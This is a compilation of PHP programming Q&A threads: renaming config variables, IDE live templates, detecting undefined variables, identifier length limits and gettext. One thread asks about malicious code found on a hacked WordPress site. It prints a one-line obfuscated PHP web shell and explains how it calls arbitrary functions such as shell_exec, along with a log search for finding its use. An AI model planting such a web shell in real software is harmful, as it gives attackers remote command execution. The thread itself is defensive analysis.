Firstly - some background. We have a config.php file which lists several variables and settings in this format:
$MY_EMAIL_ADDRESS = 'test#test.com';
$MY_WEBSITE = 'www.test.com';
$SOMETHING_ELSE = 'foobar';
I would like to replace them with more sensible (and secure) names as part of an array, throughout the entire PHP project. Mostly so we can do this more securely: Get PHP variable value via Ajax with variable name as parameter
We have also forgotten some of these variables names, so that they are used throughout the project, but possibly not documented - hence doing a search one-by-one will prove difficult.
Is there a way I can search the php files for any values that start with a dollar sign ($) and then are made up of only upper case letters and possibly underscores?
$MY_SETTING_NAME
We could then either build a list and update manually, or build some kind of script to replace things with a more sensible way of working:
$CONFIG['MY_SETTING_NAME']
Thank you!
You can use get_defined_vars function which will return all variables as array.
Please look at php.net website for example
Related
So we can use expressions to transform other variables in live templates.
For example:
Is it possible to apply snakeCase to NAME directly? So whatever I type, gets converted into snake case? Desired result:
Tried snakeCase(NAME), snakeCase(String) and snakeCase(). None seemed to work. Maybe someone had it figured out?
No, it's not possible - you can't pass a variable to itself, it has to be either another live template variable (defined before) or some known value calculated based on clipboard content (snakeCase(clipboard())), file name (snakeCase(fileName())), name got from completion, etc.
If you like to change names of existing variables, you can try String Manipulation plugin, for example
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
I have code where I use some variables. Example:
$name = "someName";
$output = sprintf($doingText, $name); // $doingText is here undefined
I want to search the code for surely undefined variables (some sort of static code analysing).
These variables should be all some language text. No problem until there, but I don't want to make manually a list which variables exist: I want to get the variable names and then make some html form where I can see them and put into database in variablename-text pairs.
Question is: how to search them? (I haven't found any script which is able to do this in PHP by googling...)
(p.s.: I don't know what is the best method to search them as there may not be only assignments by =, but also with foreach ($arr as $val) etc.)
Why not use an IDE like NetBeans? That will actively check if you have unused variables. So while your coding it will show you in real time, rather then finish the script and find out you have x amount of errors/unused variables. Just food for thought.
If I wanted to write a really long variable name like:
$this_is_my_variable_that_does_something_in_the_following_function_and_provides_some_information_with_which_the_function_relies_upon_to_do_all_the_work_it_needs = null;
would that work? same question for function/method names
Generally, such a limit is imposed by the threat of violence from other folks who interact with your code.
From the documentation:
Variable names follow the same rules
as other labels in PHP. A valid
variable name starts with a letter or
underscore, followed by any number
of letters, numbers, or underscores
The same is the case for function names, as stated here.
The limit in variable/function/method/class name length does not exist.
Comments above states that that this property should not be exploited. That is true only when it comes to human readable/human maintainable code.
However, this is extremely useful feature of PHP, that is exploited very well in a lot of very popular projects, such as Twig per example, which generates classes, example (a snippet):
class __TwigTemplate_9601167421099bbb502d119e674fed3fb71769eef256903648c9c2b4b6faa436 extends \Twig_Template {
protected function doDisplay(array $context, array $blocks = array())
{
$__internal_0abebc74dd811fd7b4cfa4c6a2fdf870d7723c04e8daf6926b04914d6644935f = $this->env->getExtension("native_profiler");
}
}
I had opportunity to benefit from same property as well in my projects.
In conclusion:
There is no limit in var/func/class name length
It is extremely useful language feature
There is a context for its usage, of course, it is not for every day work
There is no limit - but it is highly not suggested as it creates unreadable code...
PHP does not pose a length limit on it's identifiers.
That said, I'm not sure why anybody would ever want to create a 160 character variable name. I hope this is a hypothetical question.
PHP doesn't have any restriction for variable name. And my suggestion is that variable name must consist the definition of the data which you are gonna store into it.
I would like to know if I can use a gt function on a variable with php?
eg. : echo _($var);
Feel free to. But you need to make sure the possible contents of the variable makes it into .po/.mo files. (one of the ways to do assure it is to create a dummy file never processed except for by xgettext, containing _("translate me"); expressions).
I don't think gettext will recognize a variable since it scans the source code. If you want to include variables in a string, it's better to use
sprintf()
For example
echo sprintf(_("There are %d results!"), $numResults);
In gettext, the translator will see
There are %d results!
so therefore it can easily be translated as long as he/she knows that %d is a variable. When the script gets executed, gettext will first replace the translation, and then sprintf will insert the variable $numResults. Good luck! I just got done internationalizing my site.